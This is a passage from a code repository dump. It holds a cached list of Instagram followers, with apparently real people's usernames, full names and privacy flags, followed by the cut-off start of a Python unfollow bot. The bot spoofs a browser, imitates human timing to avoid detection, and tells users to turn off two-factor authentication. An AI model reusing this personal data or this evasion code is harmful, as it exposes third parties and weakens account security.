"followed_by_viewer": true, "requested_by_viewer": false}, {"id": "1617168598", "username": "jessica.muniz.sousa27", "full_name": "Jessica Muniz de Sousa", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/205237944_1010305259508567_4469523060945173455_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=n6lvDqweglgAX_yfspF&edm=AOG-cTkBAAAA&ccb=7-4&oh=1eb982bb7d9c08779b17bf929dcb208d&oe=6105B461&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "7425984937", "username": "g.schicovski", "full_name": "Guilherme Schicovski", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/160134370_2946095512328449_2127220012300446383_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=C31rqVgGfqcAX8ijZ7X&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=b3d1f9185332707afd112dc445bf213f&oe=6103C43A&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "39644859345", "username": "_xandesoaressales", "full_name": "Alexandre", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/117216903_526612091402343_2245387683186886280_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=ViUmJ-SvpSkAX8_CGUF&edm=AOG-cTkBAAAA&ccb=7-4&oh=c48e7da9c9c9ac17271aa2d560049116&oe=6104D4DA&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "31035662906", "username": "franciscobaragli2", "full_name": "francisco baragli", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/117801579_1288409238157134_9044552831396820261_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=vZNyu40SlqcAX_g0LE6&edm=AOG-cTkBAAAA&ccb=7-4&oh=3d2c0061c72f3e171dd885f7f17b6244&oe=610467E5&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41584050678", "username": "rafaelsoeiro987", "full_name": "rafael soeiro", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/163576264_167541831865819_6336218221639558533_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=RJazrRaid-MAX-2lFx7&edm=AOG-cTkBAAAA&ccb=7-4&oh=2cf2ee66d263eabbc72fd437b4ea70c6&oe=61053D39&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "6136052229", "username": "_rafaeu____", "full_name": "...", "profile_pic_url": "https://instagram.fpgz2-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fpgz2-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX_88vI0&edm=ANmP7GQBAAAA&ccb=7-4&oh=a7810048a40a876fec30c3b7538bbe86&oe=6104094F&_nc_sid=276363&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41198552981", "username": "pedrohenrique36060", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119048107_2692981657610495_2237634993642053797_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=3azVn8TypAMAX-L5i0J&edm=AOG-cTkBAAAA&ccb=7-4&oh=a3109c9919847dda0d8642aa3ffcdc4f&oe=6104A99F&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "4163195804", "username": "jaquelinejack1920", "full_name": "j@ck\ud83c\udf3b\ud83c\udf3b", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/127003997_421938209169716_4850805176315092536_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=vGT1pcF-VEMAX9qamyn&edm=AOG-cTkBAAAA&ccb=7-4&oh=eb4ea79f69b60b9e8b338da520a41ce7&oe=61044EAA&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "12430032257", "username": "danielguedes.140", "full_name": "Daniel Guedes", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/123606252_2426069727689707_344688481433092451_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=y9WCZpZ7USAAX9DihIX&edm=AOG-cTkBAAAA&ccb=7-4&oh=9d31a07db5e8fe551105cf8575cc2ced&oe=6105888C&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "10447896475", "username": "vitorpellizzari", "full_name": "Vitor Pellizzari", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/50867093_574323769660376_4194162386338316288_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=N8eJozszhBgAX8jFi0g&edm=AOG-cTkBAAAA&ccb=7-4&oh=8eaa3bb16f2f6a860117c612c2178215&oe=6104AE20&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41576084084", "username": "dodelsilvasil", "full_name": "Rogerio da silva", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/197431460_208585614449765_8734557977363518031_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=BapNTQp3OYEAX8CqopN&edm=AOG-cTkBAAAA&ccb=7-4&oh=9d401711560d03f4159f3edd3c41a2b1&oe=6104E454&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41789731052", "username": "sleekjester", "full_name": "Jess \"SleekJester\"", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119192402_114695476901844_5537009513982446981_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=MJSbpIzDQ3AAX-UaMwm&edm=AOG-cTkBAAAA&ccb=7-4&oh=d630086ceb520ba141bbc64ad3ee6e37&oe=610429CA&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "1535811621", "username": "alan.eduardo.alves", "full_name": "Alan Eduardo Alves", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/98165522_2669593369940264_8466851678384029696_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=P77pb9Bqz64AX8Xjgyz&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=9eaa336bdbd5247d1c142708df7f352e&oe=6105B5EA&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "3265924372", "username": "lucascarvalhozp", "full_name": "Lucas de Carvalho Freires", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/198387070_335479561485641_5626437956752531513_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=M0YMWcw84gEAX8v50lg&edm=AOG-cTkBAAAA&ccb=7-4&oh=0a6d7a0fc98e7b8cf34edf94585dad23&oe=6104641B&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41599386049", "username": "guilherme_4r4ujo", "full_name": "Guilherme Ara\u00fajo", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/203911598_242378734318989_715259648923416806_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=AxHtlwN-fNsAX-e2oVv&edm=AOG-cTkBAAAA&ccb=7-4&oh=320c1fa5f61b005469548426bc5eb53e&oe=610574A1&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "26544183129", "username": "cardosolaan", "full_name": "\u262f\ufe0e\u262c A\u0338S\u0338H\u0338 \u262c\u262f\ufe0e", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/171584085_2973287009608956_4227039073248724182_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=CqMtNGMr8_oAX9TbGVP&edm=AOG-cTkBAAAA&ccb=7-4&oh=8a0136bb9cee6129eaf224fc75c73f4b&oe=6105655E&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "22583693456", "username": "thiagomboni", "full_name": "Thiago Milanez Bonif\u00e1cio", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/209080497_3029348233967320_6597353355496089121_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=M6rZQSTWbboAX_YLFXs&edm=AOG-cTkBAAAA&ccb=7-4&oh=70af7193265769e2c446409c0993a064&oe=61055546&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "3300818603", "username": "vanderlei_carvalho__", "full_name": "V-A-N-D-E-R-L-E-I\u26a1\ufe0f", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/198545224_122009920013130_147231468450991716_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=QVMyFHqpEuAAX9HMVXV&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=636d8b7afd9a8d8cb4fd75d439e68b38&oe=61042C56&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "21523838090", "username": "penachogames", "full_name": "Penacho Games Andrade", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/123097783_804716387041820_8590705819225933660_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=ElY4f-DCZ00AX9MV9pV&edm=AOG-cTkBAAAA&ccb=7-4&oh=932b8b215c326d91df4c3f94869e611c&oe=6104192C&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "6166218612", "username": "clinicavittaituiutaba", "full_name": "Clinica Vitta Ituiutaba", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/51183436_242044033348613_5142100593854119936_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Ue70tmegOM4AX8hdjzt&edm=AOG-cTkBAAAA&ccb=7-4&oh=a4b80dab240e0dc0ced7218874be9ac4&oe=610546F7&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "13123653481", "username": "natures.2020", "full_name": "Luiz Soares", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/160727111_723271745003192_1054964594103069470_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=brBJ09gnOiYAX8qcsp5&edm=AOG-cTkBAAAA&ccb=7-4&oh=0adcefb1e19dadbf1acf5fee92fe0a89&oe=61044084&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "40166916641", "username": "nerdnopc", "full_name": "Por Felipe Florindo", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/117321110_590420555168678_3163502524573741746_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=a1_W4SugmLQAX-0Tk-o&edm=AOG-cTkBAAAA&ccb=7-4&oh=4575a5e42c0ef3be4fd228f64f237df0&oe=6104CA4C&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41568456183", "username": "carneiro88ster", "full_name": "Carneiro", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/139375260_866547667512779_8197553190202560939_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=DJUANhmhH68AX_xn61z&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=02d5d9df408121452f157ce1805fbdf5&oe=6103C747&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41317766687", "username": "lojaeusounerd", "full_name": "eusounerd.com.br", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119683413_321433935776154_5361237008393413738_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=n-37JlBRCtEAX9IQ-b4&edm=AOG-cTkBAAAA&ccb=7-4&oh=ab2f7f75002d64131ac8987a091aa7ba&oe=6104070C&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41791505912", "username": "brunothalesalmeida", "full_name": "Bruno Thales Almeida", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/189325143_146609240785804_752865426560595097_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=AZozNkpKTOIAX8B2PXV&edm=AOG-cTkBAAAA&ccb=7-4&oh=0b8d50a6e2ddf0659c6b7b56270245ec&oe=61051580&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "15202862030", "username": "matheus_funk_999", "full_name": "Matheus Felipe", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/208995560_183654933767226_7943172344897241019_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=UYvpXV8y5GwAX9EVmlK&edm=AOG-cTkBAAAA&ccb=7-4&oh=051990686e168da82449517eb498fab0&oe=6103F2DE&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "40816687086", "username": "uchiha._.sasuke16", "full_name": "", "profile_pic_url": "https://instagram.fpgz2-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fpgz2-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX_88vI0&edm=ANmP7GQBAAAA&ccb=7-4&oh=a7810048a40a876fec30c3b7538bbe86&oe=6104094F&_nc_sid=276363&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "676312024", "username": "thalisonsant_s", "full_name": "Thalison Santos", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119070677_123935642492296_7062138030797014940_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=RbR79GKNdRwAX8eabJP&edm=AOG-cTkBAAAA&ccb=7-4&oh=36799bd04825eff793df327a49c2e699&oe=61047E67&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "4004513564", "username": "gianluccafcecchettini", "full_name": "Gianlucca.", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/213024095_250028823235909_5289906917941871570_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=WldWH3nvSJgAX9AQTYk&edm=AOG-cTkBAAAA&ccb=7-4&oh=24e85746860ec3f1a40f173f04ac7ebe&oe=61049774&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "39885445195", "username": "xxmarcosxx20", "full_name": "xx_M.H_xx", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/118932210_368856450802776_1728611956152430572_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=WDS3S1CmURsAX8PFzbk&edm=AOG-cTkBAAAA&ccb=7-4&oh=8237e580e9fd7cd589d0dd94bba90cea&oe=6105147E&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "7215424260", "username": "gabrielsilva866", "full_name": "Gabriel Silva", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/220137117_863073241267938_1795722710984040291_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=fiBGOAtU7mcAX8w6fGG&edm=AOG-cTkBAAAA&ccb=7-4&oh=d8e53690c935be5807f70a9cba7ea5a9&oe=6105A55F&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "37772830527", "username": "__matheusfonseca__", "full_name": "MatheusFonseca", "profile_pic_url": "https://scontent-frx5-2.cdninstagram.com/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=scontent-frx5-2.cdninstagram.com&_nc_ohc=proBC-QYsOAAX8dxi2_&edm=AL4D0a4BAAAA&ccb=7-4&oh=e089873d009f2b5e6a205842af36358c&oe=6104094F&_nc_sid=712cc3&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "16408041598", "username": "marcel_orodrigues", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/223570731_1982517348564182_1967689133615289738_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=_vvKxVsuUqkAX8mwvvq&edm=AOG-cTkBAAAA&ccb=7-4&oh=c1e89c634e19569891b5820144c4272f&oe=61057A64&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "4247015881", "username": "vini_costa0", "full_name": "Vinicius Costa", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/173878707_158305382862228_2825740985526339098_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=0F8PdWgucpUAX-5hR7m&edm=AOG-cTkBAAAA&ccb=7-4&oh=22f2f4f923752c0ca726feef369c981a&oe=6104094B&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "37112605968", "username": "omeglecap", "full_name": "\ud835\udc65\ud835\udc51\ud835\udc52\ud835\udc61\ud835\udc56\ud835\udc60\n\ud83e\udd40", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/120147375_2828081874182526_4197092123475552614_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=fLcHWMXcR6YAX_GcNwk&edm=AOG-cTkBAAAA&ccb=7-4&oh=4230f6dcfd8e75fce418a98305347dab&oe=6104B852&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "18793443771", "username": "083_crock", "full_name": "G.$ \u270c\ufe0f", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/138254841_797650807514033_4984923398895981404_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Ckf0Gs790fUAX-ZIwDw&edm=AOG-cTkBAAAA&ccb=7-4&oh=b3ec030dd325e3c4f01bccbca63d4a7c&oe=6105746E&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "5517897542", "username": "g_saviotti", "full_name": "Gabriel saviotti \ud83d\ude80\ud83d\udca5", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/180890985_308810447303152_5539799826089491177_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=kjDDIKgfbFUAX-FrQPV&edm=AOG-cTkBAAAA&ccb=7-4&oh=c99bd81cc7974e7caf8c94ad4402e0bf&oe=6104E64B&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "36663848047", "username": "felipe_desgner", "full_name": "Felipe_DesignerGr\u00e1fico", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/205468473_721401962585145_8814689807099365713_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=amWRteIRDOAAX9ihQAm&edm=AOG-cTkBAAAA&ccb=7-4&oh=a01518beda0793c39ceeeef412d39e36&oe=6103D030&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "32069751053", "username": "skronrios", "full_name": "David - Skronrios \ud83c\udfae\ud83e\udd18", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/120926133_940889942987317_1396457485749636957_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=zEHv3QORCYkAX9-9Nh2&edm=AOG-cTkBAAAA&ccb=7-4&oh=676363736a3481f8a4149a0230469d69&oe=61053E36&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "2321089023", "username": "victor_g6silva", "full_name": "Victor Gabriel Silva", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/202556575_4043264979096561_716301377458424552_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=98qQjtIRe8cAX8TUQaP&edm=AOG-cTkBAAAA&ccb=7-4&oh=15d06b5f7381c0d64aab215ee980baee&oe=61053812&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41542451530", "username": "ttvdynho_", "full_name": "Anderson da Silva Alexandre", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119006314_4398090233595495_5719018449576339584_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Oz-u_PhPy1wAX8uLChU&edm=AOG-cTkBAAAA&ccb=7-4&oh=79b9ca4a5590048d529eba70af545032&oe=6104D9BF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "20233406891", "username": "_mxguelzin", "full_name": "Miguel Teixeira", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/200670171_3788768654583483_8211980559766288357_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=sY22vTiV_ZQAX8DpzJp&edm=AOG-cTkBAAAA&ccb=7-4&oh=8ede40568f4171759743572e0ddd4df7&oe=61051C2C&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "4466765097", "username": "franco.wmv", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/95139025_837414456743938_3785543810591752192_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=nWcr4Dz0nOUAX-UOYO_&edm=AOG-cTkBAAAA&ccb=7-4&oh=a64abe8ed8abab75c124fe6f791eb38f&oe=6104D7B8&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "31939499097", "username": "patinhasdegatos", "full_name": "Patinhas de Gatos", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/89851597_207487360460384_3800213142542221312_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=m8K2GVtCIrEAX_hLEms&edm=AOG-cTkBAAAA&ccb=7-4&oh=117b25c1fbfbfe99be81e60cfc8a28ac&oe=61056632&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "7570302301", "username": "francommf", "full_name": "Matheus Franco", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/173086062_493523675164449_4777096432869912783_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=qVb27kpONkEAX-YOHgw&edm=AOG-cTkBAAAA&ccb=7-4&oh=556760124a88eaf0ff3d99fd3471a9c1&oe=61042607&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "1811163844", "username": "_art.oliver", "full_name": "Arthur Oliveira", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/218043917_113769770977325_3927249888900556198_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=c6eyJ_WRKD4AX8WfTAq&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=0d0663ae8b46acdfb60376f6bd1dfc58&oe=6105A1FE&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}] -------------------------------------------------------------------------------- /Unfollow bot/cache/session.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/snkfranco/PythonGERAL/f10094a9588d9d46ef70b845e0969e04a5f95e61/Unfollow bot/cache/session.txt -------------------------------------------------------------------------------- /Unfollow bot/insta-unfollower.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Se for usar qualquer parte deste código, dê os créditos... 4 | # https://github.com/Kyogin 5 | # Para rodar use: python -u NOME_DO_ARQUIVO LOGIN_INSTAGRAM SENHA_INSTAGRAM 6 | #_______________________________________________________________________________ 7 | 8 | import colorama 9 | import os 10 | import sys 11 | import time 12 | import random 13 | import requests, pickle 14 | import json 15 | import re 16 | from datetime import datetime 17 | 18 | cache_dir = 'cache' 19 | session_cache = '%s/session.txt' % (cache_dir) 20 | followers_cache = '%s/followers.json' % (cache_dir) 21 | following_cache = '%s/following.json' % (cache_dir) 22 | 23 | instagram_url = 'https://www.instagram.com' 24 | login_route = '%s/accounts/login/ajax/' % (instagram_url) 25 | profile_route = '%s/%s/' 26 | query_route = '%s/graphql/query/' % (instagram_url) 27 | unfollow_route = '%s/web/friendships/%s/unfollow/' 28 | 29 | session = requests.Session() 30 | 31 | 32 | class Credentials: 33 | def __init__(self): 34 | if os.environ.get('INSTA_USERNAME') and os.environ.get('INSTA_PASSWORD'): 35 | self.username = os.environ.get('INSTA_USERNAME') 36 | self.password = os.environ.get('INSTA_PASSWORD') 37 | elif len(sys.argv) > 1: 38 | self.username = sys.argv[1] 39 | self.password = sys.argv[2] 40 | else: 41 | print('Por favor, informe INSTA_USERNAME e INSTA_PASSWORD como variáveis de ambiente: ./insta-unfollower.py USERNAME PASSWORD.\n Fechando...') 42 | input() 43 | sys.exit() 44 | 45 | credentials = Credentials() 46 | def login(): 47 | session.headers.update({ 48 | 'Accept-Encoding': 'gzip, deflate', 49 | 'Accept-Language': 'en-US,en;q=0.8', 50 | 'Connection': 'keep-alive', 51 | 'Content-Length': '0', 52 | 'Host': 'www.instagram.com', 53 | 'Origin': 'https://www.instagram.com', 54 | 'Referer': 'https://www.instagram.com/', 55 | 'User-Agent': ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 \ 56 | (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'), 57 | 'X-Instagram-AJAX': '7a3a3e64fa87', 58 | 'X-Requested-With': 'XMLHttpRequest' 59 | }) 60 | 61 | reponse = session.get(instagram_url) 62 | 63 | csrf = re.findall(r"csrf_token\":\"(.*?)\"", reponse.text)[0] 64 | if csrf: 65 | session.headers.update({ 66 | 'x-csrftoken': csrf 67 | }) 68 | else: 69 | print("[\033[31mx\033[m] Sem tokem CSRF encontrado nos cookies. Talvez banido por tempo. Aguarde uma hora e tente novamente..") 70 | return False 71 | 72 | time.sleep(random.randint(2, 6)) 73 | 74 | post_data = { 75 | 'username': credentials.username, 76 | 'enc_password': '#PWD_INSTAGRAM_BROWSER:0:{}:{}'.format(int(datetime.now().timestamp()), credentials.password) 77 | } 78 | 79 | response = session.post(login_route, data=post_data, allow_redirects=True) 80 | response_data = json.loads(response.text) 81 | 82 | if 'two_factor_required' in response_data: 83 | print('[\033[33m!\033[m] Por favor, desabilite a verificação de 2 fatores para login.') 84 | sys.exit(1) 85 | 86 | if 'message' in response_data and response_data['message'] == 'checkpoint_required': 87 | print('[\033[33m!\033[m] Entre no instagram e confirme que é voce que está tentando fazer login') 88 | sys.exit(1) 89 | 90 | return response_data['authenticated'] 91 | 92 | 93 | # Apenas simulando ação humana melhor 94 | def get_user_profile(username): 95 | response = session.get(profile_route % (instagram_url, username)) 96 | extract = re.search(r'window._sharedData = (.+);', str(response.text)) 97 | response = 